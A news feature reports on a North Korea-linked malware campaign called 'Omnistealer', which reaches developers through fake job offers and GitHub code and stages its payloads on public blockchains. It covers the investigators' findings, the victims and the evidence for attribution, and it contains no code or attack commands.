It started with a work offer. Last year, the blockchain crime-detection firm Crystal Intelligence’s then-vice president of engineering received a LinkedIn message from a man asking if he would be up for some freelance web development.
The VP quickly grew suspicious. He knew that North Korean hackers known as Contagious Interview regularly use fake job offers to scam targets out of their cryptocurrency. Since this “job” involved running code from GitHub, he decided to check it out and made a crucial discovery: Hidden in the GitHub code was the start of an attack chain, formatted so that most developers doing what they think is an innocuous contract job wouldn’t notice.
That code, when run, reaches out to the TRON or Aptos blockchains, publicly accessible ledgers that record and facilitate cryptocurrency transactions (specifically favored because transactions there are cheap), and pulls information it uses as a “pointer” to the Binance Smart Chain. The Binance Smart Chain, in turn, pulls code that “fetches the final form—malicious code,” said Nick Smart, Crystal Intelligence’s chief intelligence officer. When run, that code can gain access to so much information on victims’ devices that investigators at Ransom-ISAC, a small, recently formed group of international cybersecurity professionals working across different anti-cybercrime organizations, dubbed it Omnistealer.
“It literally steals everything,” said Ellis Stannard, a core member of Ransom-ISAC. His team found that this Omnistealer was compatible with more than 60 cryptocurrency wallet extensions, including MetaMask and Coinbase; more than 10 password managers, including LastPass; more than 10 web browsers, including Chrome and Firefox; and cloud storage services like Google Drive. That means, in addition to stealing cryptocurrency, it could also swipe passwords and privileged credentials for accessing organizations’ information.
What first appeared to be a common job-interview phishing campaign ultimately revealed a hack so widespread and easy to replicate that investigators fear irreversible damage. Malware deployed via seemingly innocent GitHub repositories and embedded in blockchains, where the malware will be stored forever (and increasingly difficult to root out as the chains grow), makes for an almost unstoppable technology.
Hiding malicious payloads within blockchain has become an emerging obfuscation technique.
– Random-ISAC
Ransom-ISAC researchers spoke exclusively with PCMag about the targets of this attack, their theories about the scammers’ motivations, and concerns about the hack’s sheer volume. Smart compares its scope to WannaCry, the high-profile global ransomware attack that affected more than 200,000 computers in 2017. Investigators believe Ominstealer will spread much wider than its 2017 predecessor. What’s even more concerning is that we don’t know the hackers’ ultimate goal, whether it’s to simply collect data, obtain remote access to various systems, or something else.
Tracing Stolen Crypto to Vladivostok Reveals North Korean Links
Upon further digging, investigators linked this malware activity to some telling IP addresses. In particular, they came across one address associated with the former US general consulate building in Vladivostok, Russia, which other cybercrime researchers had previously linked to North Korean state-backed actors.
“Yesterday, Vladivostok had more cash in it as reserves than Moscow,” Smart told me in December, and that’s not because the roughly 600,000-person city is home to the one percent. Rather, the hackers Smart and colleagues traced to an IP address in this city have been using the wily method his team uncovered to pilfer millions of dollars’ worth of cryptocurrency. The sneakiest part? The code these hackers used to start the chain reaction that ultimately deploys the Omnistealer malware had, in some cases, been hidden in blockchain transactions for years before activation—like a code-based sleeper agent.
“Hiding malicious payloads within blockchain has become an emerging obfuscation technique,” reads a blog post written by collaborators at Ransom-ISAC. However, the “attack chains” investigators uncovered here stand out for their reach—around 300,000 stolen credentials have been linked to this hack so far, says Stannard, and that’s likely the tip of the iceberg. So far, compromised organizations include cybersecurity firms, defense companies, and government entities in countries like the US and Bangladesh.
Ransom-ISAC’s blog post calls the hack “more sophisticated” than what they’ve seen from some North Korean state actors who have perpetrated scams via false job interviews in the past. What investigators uncovered was a complex attack involving blockchain infrastructure, malware that functions across various platforms, and thousands of software developers and the companies that hire them.
Global Developers and Contractors Are the First Line of Attack
As of January, the hackers perpetrating these attacks have been doing so by disguising themselves in one of two ways to reach what appear to be their ultimate targets—businesses that tend to outsource their software engineering with little oversight.
To gain access, the hackers pose as recruiters seeking contractors for those companies and therefore possess their credentials (which the scammers can obtain with Omnistealer), or as freelance developers seeking to be hired themselves.
Ransom-ISAC researchers found that using these two methods, hackers obtained emails and credentials for a wide array of organizations, including an adult industry company, a French financial compliance firm, a kosher food delivery service, and security and defense companies.
Multiple email addresses and credentials leaked in these hacks were linked to US military domains, and some exposed email addresses ended in .gov. One company is an approved supplier to Lockheed Martin, the US-based defense and aerospace contractor. Other major targets include an Indian firm specializing in surveillance and electronic warfare, an AI solutions company, and a global web design agency. (Investigators asked that we not publish organization names for national security reasons.)
Since this case, I haven’t been able to look at GitHub the same way.
– Ellis Stannard, researcher for Ransom-ISAC
When hackers masquerade as recruiters, they “hire” contractors who unwittingly deploy malware. The hackers might do this by having developers run sneakily infected GitHub code, like what the Crystal Intelligence VP found. These contractors typically reside in South Asian countries like India and are opportune initial targets for several reasons. Not only was India the “largest source of new developers on GitHub” in 2025, according to the platform, but it also topped blockchain analysis company Chainalysis’s crypto adoption index that year, making developers there an attractive target for digital currency thieves. Plus, targets in countries where people generally make lower incomes may be less likely to turn down job offers. Ultimately, the scammers appear to use their initial contractor targets as unsuspecting mules for the malware payload.
LinkedIn, Upwork, Telegram: How Hackers Recruit the Unwitting
Scammers involved in this operation usually initiate contact via platforms like LinkedIn, Upwork, Telegram, and Discord. In response to our request for comment, a LinkedIn representative shared posts it has published to help users spot fake jobs and recruiters. An Upwork representative told PCMag that the jobs site “encourages” customers to exercise caution with “unfamiliar downloads” and use “secure testing environments” when working off its platform.
Hackers looking to be hired as freelancers, meanwhile, infect the companies that hire them firsthand. They “push out garbage pull requests in GitHub that contain hidden malware,” Stannard says. “Since this case, I haven’t been able to look at GitHub the same way.”
It’s unclear why these hackers would want inside access to organizations like kosher delivery services—perhaps they’re just casting a wide net to see what they can access. That said, the presence of companies concerned with defense, security, and sensitive radar systems among the apparent ultimate targets raises obvious red flags.
State-Linked Hackers May Be Pulling the Strings
It can be difficult to determine who’s behind complex hacks like this, but investigators believe state-sponsored North Korean hackers may be responsible. Some specific malware and IP addresses, including the one from Vladivostok, overlapped with infrastructure previously used by North Korean actors.
Security company Trend Micro has documented that actors who’ve worked on past operations benefiting the North Korean government have used these addresses, particularly in scams involving fake recruiters. A 2019 NATO paper called North Korea’s Cyber Operations and Strategies cited links between North Korea and Vladivostok, noting that “North Korea decided to expand its internet connection to Russia” around 2017.
Some of the crypto wallets used in these hacks were also linked to the North Korean state actors known for their involvement in WannaCry and the 2014 hack of Sony Pictures by Lazarus Group. Specifically, investigators linked the wallets involved in this hack to Lazarus Group’s $1.5 billion theft from the Dubai-based cryptocurrency exchange Bybit back in February 2025.
However, this group’s tactics resemble those of Contagious Interview more than Lazarus, says Nick Carlsen, a senior investigator specializing in North Korea at the blockchain intelligence company TRM Labs. In an interview, he noted that Contagious moves their stolen crypto gains using “completely different” methods than Lazarus. He described Contagious as a “smaller subset group,” adding that different levels of the North Korean government have their own hacking teams, much as the CIA, FBI, and NSA do.
This technique highlights the continuing evolution of the DPRK’s ability to exploit the web3 space.
– The Federal Bureau of Investigation
While the North Korean thefts that Carlsen has observed focus on stealing cryptocurrency to fund the nation’s operations (such as building nuclear weapons), he suggests that the hackers Ransom-ISAC has been investigating could also use the credentials they’ve obtained to create fake identities for North Korean IT workers. With those false personas, these IT workers could more easily open accounts not associated with North Korea to help launder ill-gotten gains for its government. Carlsen also raises other possible financially motivated scenarios for this hack, such as the perpetrators selling online the credentials they’ve accessed on underground markets.
“Everything about this has DPRK written all over it,” Stannard said. He explained that these aren’t some guys messing around in a basement. They’re organized actors using malware that can extract both corporate access credentials and cryptocurrency, both extremely valuable resources for a widely sanctioned nation.
The Malware Isn’t Going Away—and Neither Is the Threat
Nefarious actors will likely continue to use blockchain-encoded malware for theft because it’s cheap to execute. And once that malware is embedded in the blockchain, it’s there to stay. Then, as more transactions take place on the chain, they further bury the malware, making it exceptionally difficult—and expensive—to track, given the long hours investigators must devote to the search. Adding AI-assisted coding to this mix makes it relatively simple for even amateur coders to replicate these attacks.
Meanwhile, wide swaths of South Asian freelance software developers and contract companies could face consequences from lost credentials and reduced confidence.
Smart and Stannard say they’ve informed the FBI’s Internet Crime Complaint Center about their findings. In response to PCMag’s request for comment, the FBI said it is “aware of the DPRK utilizing social engineering tactics to target developers in the blockchain development space, and this technique highlights the continuing evolution of the DPRK’s ability to exploit the web3 space.” Because of “ongoing investigations,” the bureau wouldn’t elaborate further.
Still, Smart and Stannard have lingering questions. Namely, while investigating the malicious code hidden in these blockchain transactions, they found additional surprises, such as audio and image files secreted within.
One hidden file reveals a human chest X-ray (I showed it to a doctor, who said it appeared normal). Another featured a paper about rocket propulsion. Smart contacted a rocket scientist, who called it “kind of a crap paper,” but theoretically sound. Possibly, these files show hackers testing what they can hide on the blockchain.
“My thought was, ‘This is a numbers station,'” said Smart, referring to the shortwave radio stations through which intelligence workers transmit clandestine messages via seemingly random numbers. “But I’ve got no evidence to prove it.”
While investigators still don’t know why hackers have been hiding cryptic audio and image files along with malware on these blockchains, they believe finding out more about the hackers’ identities could shed light on these remaining mysteries. So far, the search has led investigators to Airbnbs in Southeast Asia, where groups of alleged hackers operate—and potentially test what kinds of information they can conceal using this cryptocurrency-enabled technology.
About Our Expert
I’m a freelance journalist covering the cryptocurrency industry, technology, sex work, and intimate partner violence, among other topics. My work has appeared in publications including Wired, MIT Technology Review, Fortune, The Atlantic, The Guardian, and The New York Times. As a contributing reporter at the Fuller Project, a nonprofit newsroom dedicated to journalism about women, I received the 2021 NAJA National Native Media Award for Best Coverage of Native America.
I’ve been on the crypto beat since 2017. In that time, I’ve investigated the marginalization of women in the industry for Cosmopolitan, helped shape GQ‘s magazine 2022 coverage of NFTs, and traveled to Australia to report on a blockchain network used by North Korean hackers for MIT Technology Review.
